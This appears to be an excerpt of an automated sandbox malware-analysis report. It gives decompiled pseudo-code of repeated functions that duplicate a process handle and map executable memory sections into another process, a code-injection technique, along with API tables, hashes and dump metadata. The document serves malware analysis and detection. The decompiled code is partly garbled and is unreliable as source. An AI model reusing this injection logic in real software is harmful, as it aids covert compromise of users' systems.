					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
						_v12 = 0;
						_t103 =  &_v84;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t134 =  &_v88;
						if(NtCreateSection(_t134, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t111 =  &_v72;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t134, 0xffffffff, _t111, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t113 =  &_v64;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t134, _v16, _t113, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
									_t134 = _v72;
									 *((intOrPtr*)(_t118 + 0x20))(0, _t134, 0x104);
									_t134[0x82] = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t105 =  &_v84;
						_t124 = _a12 + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t124;
						while(1) {
							_a1750575217 = _a1750575217 | _t124;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t124;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t134) != 0 || _v12 == 0) {
								goto L75;
							}
							_push(_v84);
							_pop( *_t47);
							_t107 =  &_v76;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t134, 0xffffffff, _t107, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t109 =  &_v68;
								 *_t109 = 0;
								_t124 =  &_v60;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t130;
									 *((intOrPtr*)(_t124 + 0x57)) =  *((intOrPtr*)(_t124 + 0x57)) + _t130;
									_push(0);
									_push(0);
									_push(_t109);
									_push(_v16);
									_t109 = NtMapViewOfSection( *_t134);
									_t156 = _t109;
									if(_t156 != 0) {
										goto L75;
									}
									L28();
									if(_t156 == 0 && _t156 != 0) {
										asm("out dx, al");
										if(_t156 > 0) {
											continue;
										} else {
											if (_t156 > 0) goto L22;
											goto L32;
										}
									}
									goto L75;
								}
							}
							goto L75;
						}
					}
				}
				L75:
				_push(0x165f);
				_t97 =  *_t138;
				_t120 = 0x38c;
				_t129 = 0xfd;
				L004012A4(_t97, _t118, _t120, _t129, 0, _t134, __eflags);
				return _t97;
			}

0x00401625
0x0040162a
0x0040162d
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401706
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401796
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
Instruction ID: b20ec665c7e4e3296b0f18af3c28397e7cf24639ebe04dcdbabd140aff290070
Opcode Fuzzy Hash: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
Instruction Fuzzy Hash: 376160B0500249FBEB209F95CC49FEF7BB8EF91B00F14416AF912BA1E4D6759901DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401636 Relevance: 10.7, APIs: 7, Instructions: 192
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00401636(void* __eax) {
				void* _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void** _t122;
				signed char _t125;
				void* _t129;
				void* _t130;
				signed char _t131;
				void* _t132;
				HANDLE* _t136;
				void* _t139;
				void* _t140;
				intOrPtr* _t142;
				void* _t146;
				long _t161;

				_t91 = __eax;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t129 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t129, _t132, 0xf9e70ceb, _t146);
				_t140 = _t139 + 1;
				asm("cld");
				asm("invalid");
				_t118 =  *((intOrPtr*)(_t140 + 8));
				 *((intOrPtr*)(_t140 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t140 - 0x34)) =  *((intOrPtr*)(_t140 - 0x34)) + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t140 - 0x5c)) = _t93;
				_t136 = _t140 - 0x60;
				 *_t136 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t136);
				_t96 =  *_t136;
				if(_t96 != 0) {
					_t122 = _t140 - 0x30;
					 *_t122 = _t96;
					_t122[1] = 0;
					_t136 = _t140 - 0x28;
					 *((intOrPtr*)(_t118 + 0x10))(_t136, 0x18);
					 *_t136 = 0x18;
					_t131 = _t136;
					_push(_t140 - 0x30);
					_push(_t131);
					_push(0x40);
					_push(_t140 - 0x10);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t140 - 0x10), 0xffffffff, 0xffffffff, _t140 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t140 - 8)) = 0;
						_t103 = _t140 - 0x50;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t136 = _t140 - 0x54;
						if(NtCreateSection(_t136, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t140 - 0x50);
							_t111 = _t140 - 0x44;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t136, 0xffffffff, _t111, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
								_t113 = _t140 - 0x3c;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t136,  *(_t140 - 0xc), _t113, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
									_t136 =  *(_t140 - 0x44);
									 *((intOrPtr*)(_t118 + 0x20))(0, _t136, 0x104);
									_t136[0x82] =  *(_t140 + 0x14);
									 *((intOrPtr*)(_t140 - 8)) =  *((intOrPtr*)(_t140 - 8)) + 1;
								}
							}
						}
						_t105 = _t140 - 0x50;
						_t125 =  *((intOrPtr*)(_t140 + 0x10)) + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t125;
						while(1) {
							 *(_t140 + 0x6857a875) =  *(_t140 + 0x6857a875) | _t125;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t125;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t136) != 0 ||  *((intOrPtr*)(_t140 - 8)) == 0) {
								goto L73;
							}
							 *_t47 =  *(_t140 - 0x50);
							_t107 = _t140 - 0x48;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t136, 0xffffffff, _t107, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
								_t109 = _t140 - 0x40;
								 *_t109 = 0;
								_t125 = _t140 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t131;
									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
									_push(0);
									_push(0);
									_push(_t109);
									_push( *(_t140 - 0xc));
									_t109 = NtMapViewOfSection( *_t136);
									_t161 = _t109;
									if(_t161 != 0) {
										goto L73;
									}
									L26();
									if(_t161 == 0 && _t161 != 0) {
										asm("out dx, al");
										if(_t161 > 0) {
											continue;
										} else {
											if (_t161 > 0) goto L20;
											goto L30;
										}
									}
									goto L73;
								}
							}
							goto L73;
						}
					}
				}
				L73:
				_push(0x165f);
				_t97 =  *_t142;
				_t121 = 0x38c;
				_t130 = 0xfd;
				L004012A4(_t97, _t118, _t121, _t130, 0, _t136, __eflags);
				return _t97;
			}

0x00401636
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165b
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
Instruction ID: 1a98c01ee067268ab26ec5aa6b62cb03245118aa372be3bd2590492ddd99a6c2
Opcode Fuzzy Hash: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
Instruction Fuzzy Hash: 3B616EB1900209AFDB209F91CC49FEF7BB8FF86700F14056AF911BA2E1D6759901CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00401620() {
				intOrPtr _t92;
				intOrPtr _t94;
				void* _t97;
				intOrPtr _t98;
				struct _GUID _t104;
				signed char* _t106;
				PVOID* _t108;
				PVOID* _t112;
				PVOID* _t114;
				void* _t118;
				intOrPtr _t119;
				void* _t122;
				void** _t123;
				signed char _t126;
				void* _t130;
				void* _t131;
				signed char _t132;
				void* _t133;
				void* _t136;
				HANDLE* _t137;
				void* _t140;
				void* _t141;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t148;
				long _t163;

				asm("out 0x31, eax");
				asm("out dx, al");
				_push(0x165f);
				_t92 =  *_t143;
				_t144 = _t143 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t130 = 0xfd;
				L004012A4(_t92, _t118, 0x38c, _t130, _t133, _t136, _t148);
				_t141 = _t140 + 1;
				asm("cld");
				asm("invalid");
				_t119 =  *((intOrPtr*)(_t141 + 8));
				 *((intOrPtr*)(_t141 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
				}
				while(1) {
					_t94 =  *((intOrPtr*)(_t119 + 0x48))();
					if(_t94 != 0) {
						break;
					}
					 *((intOrPtr*)(_t119 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t141 - 0x5c)) = _t94;
				_t137 = _t141 - 0x60;
				 *_t137 = 0;
				 *((intOrPtr*)(_t119 + 0x4c))(_t94, _t137);
				_t97 =  *_t137;
				if(_t97 != 0) {
					_t123 = _t141 - 0x30;
					 *_t123 = _t97;
					_t123[1] = 0;
					_t137 = _t141 - 0x28;
					 *((intOrPtr*)(_t119 + 0x10))(_t137, 0x18);
					 *_t137 = 0x18;
					_t132 = _t137;
					_push(_t141 - 0x30);
					_push(_t132);
					_push(0x40);
					_push(_t141 - 0x10);
					if( *((intOrPtr*)(_t119 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t141 - 8)) = 0;
						_t104 = _t141 - 0x50;
						 *((intOrPtr*)(_t104 + 4)) = 0;
						 *_t104 = 0x5000;
						_t137 = _t141 - 0x54;
						if(NtCreateSection(_t137, 6, 0, _t104, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t141 - 0x50);
							_t112 = _t141 - 0x44;
							 *_t112 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t112, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t114 = _t141 - 0x3c;
								 *_t114 = 0;
								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t114, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
									_t137 =  *(_t141 - 0x44);
									 *((intOrPtr*)(_t119 + 0x20))(0, _t137, 0x104);
									_t137[0x82] =  *(_t141 + 0x14);
									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
								}
							}
						}
						_t106 = _t141 - 0x50;
						_t126 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
						_t106[4] = 0;
						 *_t106 = _t126;
						while(1) {
							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t126;
							 *_t106 =  &(_t106[ *_t106]);
							 *_t106 =  *_t106 + _t126;
							_push(0x40);
							_push(_t106);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
								goto L74;
							}
							 *_t47 =  *(_t141 - 0x50);
							_t108 = _t141 - 0x48;
							 *_t108 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t108, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t110 = _t141 - 0x40;
								 *_t110 = 0;
								_t126 = _t141 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t132;
									 *((intOrPtr*)(_t126 + 0x57)) =  *((intOrPtr*)(_t126 + 0x57)) + _t132;
									_push(0);
									_push(0);
									_push(_t110);
									_push( *(_t141 - 0xc));
									_t110 = NtMapViewOfSection( *_t137);
									_t163 = _t110;
									if(_t163 != 0) {
										goto L74;
									}
									L27();
									if(_t163 == 0 && _t163 != 0) {
										asm("out dx, al");
										if(_t163 > 0) {
											continue;
										} else {
											if (_t163 > 0) goto L21;
											goto L31;
										}
									}
									goto L74;
								}
							}
							goto L74;
						}
					}
				}
				L74:
				_push(0x165f);
				_t98 =  *_t144;
				_t122 = 0x38c;
				_t131 = 0xfd;
				L004012A4(_t98, _t119, _t122, _t131, 0, _t137, __eflags);
				return _t98;
			}

0x00401622
0x00401624
0x00401625
0x0040162a
0x0040162d
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165b
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
Instruction ID: 1699ca97ca40bad7abeb66134b5fd6c1258c3ab016587a1f667b162b5110635e
Opcode Fuzzy Hash: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
Instruction Fuzzy Hash: 5B513DB4900249BFEB209F95CC48FEF7BB8EF85700F14416AF911BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401633 Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00401633(void* __edi) {
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void** _t122;
				signed char _t125;
				void* _t129;
				void* _t130;
				signed char _t131;
				void* _t136;
				HANDLE* _t137;
				void* _t140;
				void* _t141;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t148;
				long _t163;

				_t133 = __edi - 1;
				_t148 = __edi - 1;
				_push(0x165f);
				_t91 =  *_t143;
				_t144 = _t143 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t129 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t129, _t133, _t136, _t148);
				_t141 = _t140 + 1;
				asm("cld");
				asm("invalid");
				_t118 =  *((intOrPtr*)(_t141 + 8));
				 *((intOrPtr*)(_t141 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t141 - 0x5c)) = _t93;
				_t137 = _t141 - 0x60;
				 *_t137 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t137);
				_t96 =  *_t137;
				if(_t96 != 0) {
					_t122 = _t141 - 0x30;
					 *_t122 = _t96;
					_t122[1] = 0;
					_t137 = _t141 - 0x28;
					 *((intOrPtr*)(_t118 + 0x10))(_t137, 0x18);
					 *_t137 = 0x18;
					_t131 = _t137;
					_push(_t141 - 0x30);
					_push(_t131);
					_push(0x40);
					_push(_t141 - 0x10);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t141 - 8)) = 0;
						_t103 = _t141 - 0x50;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t137 = _t141 - 0x54;
						if(NtCreateSection(_t137, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t141 - 0x50);
							_t111 = _t141 - 0x44;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t111, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t113 = _t141 - 0x3c;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t113, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
									_t137 =  *(_t141 - 0x44);
									 *((intOrPtr*)(_t118 + 0x20))(0, _t137, 0x104);
									_t137[0x82] =  *(_t141 + 0x14);
									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
								}
							}
						}
						_t105 = _t141 - 0x50;
						_t125 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t125;
						while(1) {
							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t125;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t125;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
								goto L75;
							}
							 *_t47 =  *(_t141 - 0x50);
							_t107 = _t141 - 0x48;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t107, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t109 = _t141 - 0x40;
								 *_t109 = 0;
								_t125 = _t141 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t131;
									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
									_push(0);
									_push(0);
									_push(_t109);
									_push( *(_t141 - 0xc));
									_t109 = NtMapViewOfSection( *_t137);
									_t163 = _t109;
									if(_t163 != 0) {
										goto L75;
									}
									L28();
									if(_t163 == 0 && _t163 != 0) {
										asm("out dx, al");
										if(_t163 > 0) {
											continue;
										} else {
											if (_t163 > 0) goto L22;
											goto L32;
										}
									}
									goto L75;
								}
							}
							goto L75;
						}
					}
				}
				L75:
				_push(0x165f);
				_t97 =  *_t144;
				_t121 = 0x38c;
				_t130 = 0xfd;
				L004012A4(_t97, _t118, _t121, _t130, 0, _t137, __eflags);
				return _t97;
			}

0x00401633
0x00401633
0x00401625
0x0040162a
0x0040162d
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165b
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
Instruction ID: 5655e8303908613cde864c6bbac167efe87e7d1838107c86971bbf59092d50a6
Opcode Fuzzy Hash: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
Instruction Fuzzy Hash: 57513BB0900249BBEB208F95CC48FEF7BB8EF85B00F14416AF911BA2E4D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004017E4 Relevance: 4.7, APIs: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
